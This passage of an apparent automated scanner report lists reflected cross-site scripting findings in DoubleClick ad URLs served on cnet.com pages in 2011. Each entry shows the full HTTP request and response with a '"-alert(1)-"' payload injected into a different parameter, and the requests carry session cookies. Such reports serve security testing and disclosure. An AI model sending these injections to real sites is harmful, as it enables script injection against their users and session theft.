Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.
...[SNIP]...

3.186. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e784"-alert(1)-"614b3ef8fb was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

3.187. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee2e"-alert(1)-"625b1fe02f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/
...[SNIP]...

3.188. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4e31"-alert(1)-"b2055b50289 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/166/%2a/w%3B240097948%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&co
...[SNIP]...

3.189. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bed07"-alert(1)-"256a1270d98 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B0%3B61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX
...[SNIP]...

3.190. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42f7"-alert(1)-"fff3f79dcc6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/166/%2a/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpn
...[SNIP]...

3.191. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d44"-alert(1)-"a0df08ac7bf was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

3.192. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f109"-alert(1)-"d9fd11bfd28 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAAB
...[SNIP]...

3.193. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa1a"-alert(1)-"e0b3d5aee59 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=
...[SNIP]...

3.194. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6f7"-alert(1)-"367490e803e was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094
...[SNIP]...

3.195. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc88"-alert(1)-"f8894e94b96 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

